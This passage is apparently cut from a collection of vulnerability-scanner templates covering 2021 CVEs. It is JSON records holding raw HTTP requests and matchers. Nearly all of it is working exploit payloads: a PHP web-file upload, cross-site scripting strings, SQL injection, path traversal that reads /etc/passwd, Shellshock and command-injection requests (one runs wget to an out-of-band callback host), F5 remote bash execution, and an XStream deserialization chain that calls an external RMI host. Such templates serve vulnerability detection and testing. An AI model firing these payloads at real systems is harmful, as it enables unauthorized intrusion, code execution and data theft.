{{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-4436","info":{"name":"3DPrint Lite < 1.9.1.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353\n\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"action\"\n\np3dlite_handle_upload\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: text/php\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------54331109111293931601238262353--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jsonrpc\":\"2.0\"","\"filename\":","{{filename}}.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24215","info":{"name":"Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")"],"condition":"and"}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-38147","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(header, 'application/vnd.openxml', 'attachment; filename=')","contains(body, '<?xml version=')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"regex","negative":true,"part":"body","regex":["^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40272","info":{"name":"IRTS OP5 Monitor - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"help\\'onmouseover=alert(document.domain)/\\'/;/beta/license?format=json\\'>JSON\")","contains_any(tolower(body), \"op5 monitor\", \"itrs\")","contains(content_type, \"text/html\")","status_code == 401"],"condition":"and"}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; 